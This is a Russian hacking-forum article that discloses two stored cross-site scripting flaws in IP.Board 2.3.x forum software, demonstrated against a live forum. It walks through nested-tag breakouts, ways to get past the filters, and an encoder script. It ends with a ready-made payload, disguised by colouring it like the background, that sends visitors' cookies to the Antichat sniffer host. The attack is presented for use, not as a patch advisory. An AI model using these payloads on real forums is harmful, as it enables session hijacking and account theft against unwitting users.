Форум АНТИЧАТ - Активный межсайтовый скриптинг в IP.Board 2.3.* на примере http://forum.inattack.ru/

В этой небольшой статье я покажу вам две новые (16.12.08) уязвимости класса активный межсайтовый скриптинг в движке форума IP.Board 2.3-2.3.5 (последняя стабильная версия) на примере известного всем форума http://forum.inattack.ru/ (надо сказать что на оффициальном сайте в предоставленной demo-среде уязвимость также работает).

С увеличением показателя версии движка постоянно увеличивается безопасность этого форумного движка - злоумышленники ищут всё более изощрённые методы заливки своих сценариев из-под привелигированного аккаунта, довольствуются пассивным межсайтовым скриптингом в сторонних модулях и ничего особенного нового не происходит, потому что скрипт этот уже порядком выдержан временем.

Однако новые версии продуктов несут не только стабильность с багфиксами и ужесточение политики безопасности, но и нововведения, которые несут в себе ещё не исследованные участки кода, манящего к себе специалистов по безопасности и производной от них "живности".

Итак, первый момент, упущенный разработчиками, ведущий к нарушению политики безопасности посредством внедрения произвольного Javascript-сценария.

В новых версиях форума появились новые bb-теги, такие как:

Код:

[snapback]100[/snapback]

This tag displays a little linked image which links back to a post - used when quoting posts from the board. Opens in same window by default.



[topic=100]Click me![/topic]

This tag provides an easy way to link to a topic



Click me!

This tag provides an easy way to link to a post.



[acronym='Laugh Out Loud']lol[/acronym]

Allows you to make an acronym that will display a description when moused over

Не буду тянуть кота за ..., а скажу сразу - 4-й тег остался без проверки разработчиков на вложенность. Все значения параметров других bb-тегов обрамляются двойной кавычкой, а уязвимый тег - одинарной, поэтому для выхода за пределы значения параметра мы будем использовать этот же уязвимый тег.

Перейдём к практике и посмотрим, что там и как выглядит. Пишем к себе в личные сообщения и делаем предпросмотр следующего кода:

Код:

[acronym='test1[acronym='test2']test1']test2[/acronym]test1[/acronym]

И получаем на выходе следующий html-код:

Код HTML:

<acronym title='test1<acronym title='test2'>test1'>test2</acronym>test1</acronym>

Видно, что значение "test2" параметра title уже вышло из пределов кавычек теперь мы можем составить свой параметр и дать ему значение. Разделять параметр от прошлого мусора будем пробелом - он не преобразуется в url-кодировку, как это часто бывает. Добавим к пример событие "onmouseover" с простым сценарием "alert(1)" и добавим ещё пробел, чтобы изолироваться от болтающейся неиспользованной кавычки справа. Итого получим такой bb-код:

Код:

[acronym='test1[acronym='test2 onmouseover=alert(1); ']test1']test2[/acronym]test1[/acronym]

Код HTML:

<acronym title='test1<acronym title='test2 onmouseover=alert(1); '>

На сцену вступает защита, о которой я говорил - "чем больше версия, тем больше наворотов", и которая не даст нам добавить события типа onclick, onload и им подобные. Но тем не менее мы можем реализовать уязвимость через каскадные стили:

style=background:url(java/**/script:alert(1)) - для IE 6
style=-moz-binding:url(http://site.com/x.xml#xss) - для FF,

Форум разбивает слово javascript на две части, поэтому мы разделили его комментарием и сохранили работоспособность. Сам javascript-сценарий следует поместить в зашифрованном виде в функцию "string.fromcharcode()", иначе у вас не получится написать рабочий код без нарушения общего синтаксиса. Но и это не всё - зашифрованный сценарий (вида: 23,45,234,89,24,235,32,346,347,74,7,5 и т.д.) получится слишком длинным и форум разорвёт его пробелами, что так же делает код небоеспособным. Для этого нужно делать несколько предпросмотров и смотреть исходник - в местах, где форум свтсвил пробел вставляем уже описанный выше трюк - "/**/" (и получится что-то вроде 23,45,/**/234,89,24,235,32,346,347,/**/74,7,5 и т.д.). И опять же не всё, наберитесь терпения =). Форум так же избавляется от параметра "-moz-binding", поэтому мы используем трюк, описанный тут: http://www.thespanner.co.uk/2008/02/...nding-xss-fun/

И для варианта с "-moz-binding" содержимое файла "x.xml" должно быть следующее:

Код:

<?xml version="1.0"?>

<bindings xmlns="http://www.mozilla.org/xbl"

xmlns:html="http://www.w3.org/1999/xhtml">



<binding id="xss">

<implementation>

<constructor>

alert(1);

</constructor>

</implementation>

</binding>



</bindings>

Первая уязвимость описана. Осталась вторая - не такая интересная, просто потому что реализация её не требует размышлений и поиска подходов как в первом случае. Уязвимость того же класса и опять же в bb-тегах, но на этот раз в самодельных. Админ сам может добавить bb-теги по своему усмотрению, вот тут-то мы и приведём пример на форуме http://forum.inattack.ru/. На данном форуме стоит последняя версия рассматриваемого движка и установлен дополнительный bb-тег под названием [wiki]word[/wiki], который преобразуется в ссылку на энциклопедию проекта. Все созданные таким образом дополнительные теги не только не подвергаются проверке вложенности, но и обделены проверкой, не дававшей нам использовать события типа "onerror" и ему подобные. Поэтому в поиске лёгких путей такое событие мы и используем.

Посмотрим для начала как происходит нарушение структуры тега. Предпросматриваем такой код:

Код:

[wiki]be1[wiki]be2[/wiki]be[/wiki]

И получаем:

Код HTML:

<a href='http://wiki.inattack.ru/wiki/be1<a href='http://wiki.inattack.ru/wiki/be2'>be[wiki]be</a>be'>be'>be[wiki]be</a>be</a>

То бишь на месте "be2" мы уже можем разворачивать свою деятельность в следующем виде:

Код:

[wiki][wiki]m onmouseover=alert(document.cookie) [/wiki][/wiki]

Получим событие при наведении на надпись - алерт с cookies. Для соблюдения работоспособности и добавления полноценного javascript-кода всё же придётся использовать ф-ции "eval(String.fromCharCode())" и добавлять туда комментарии на места расставляемых форумом пробелов. Искать софт для кодирования я не стал, а быстренько набросал простой скрипт на PHP:

PHP код:


		
			
<?php 

$str=$_GET['str'];

    for($i=0; $i!=strlen($str); $i++)

    {

    if($i+1==strlen($str)) $tmp .= ord($str[$i]);

    else $tmp .= ord($str[$i]).',';

    }

echo $tmp;

?>

Ну и на последок я покажу полностью боевой код для вышеописанного форума, настроенный на передачу cookies пользователя на сниффер Античата(Логи тут:http://old.antichat.ru/sniff/log.php):

Код:

[wiki][wiki][*color=#0a1320]m onmouseover=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,/**/105,109,97,103,101,115,91,49,93/**/,46,115,114,99,61,39,104,116,116,/**/112,58,47,47,111,108,100,46,97,/**/110,116,105,99,104,97,116,46,114,/**/117,47,99,103,105,45,98,105,110,47,/**/115,46,106,112,103,63,39,43,100,/**/111,99,117,109,101,110,116,46,99,/**/111,111,107,105,101,59)); [/wiki][/color*][/wiki]

В дополнение я окрасил кривой текст в цвет фона блока сообщения, поэтому больше шансов, что пользователь наведёт мышкой по ссылке, но в то же время не увидит её.

Завершая сие скромное исследование хотелось бы огорчить ещё скрипт-киддисов потому как я не упомянул об одной тонкости - на всех рассматриваемых форумах кукисы присваиваются с флагом "httpOnly", что означает, что уязвимость надо дотачивать. Это не проблема для знающих людей, но проблема для шкодливых и назойливых школьников. Про обход httpOnly можно почитать на том же Inattack: http://www.inattack.ru/article/563.html.

Удачи, спасибо за внимание. brain[pillow], специально для Античат.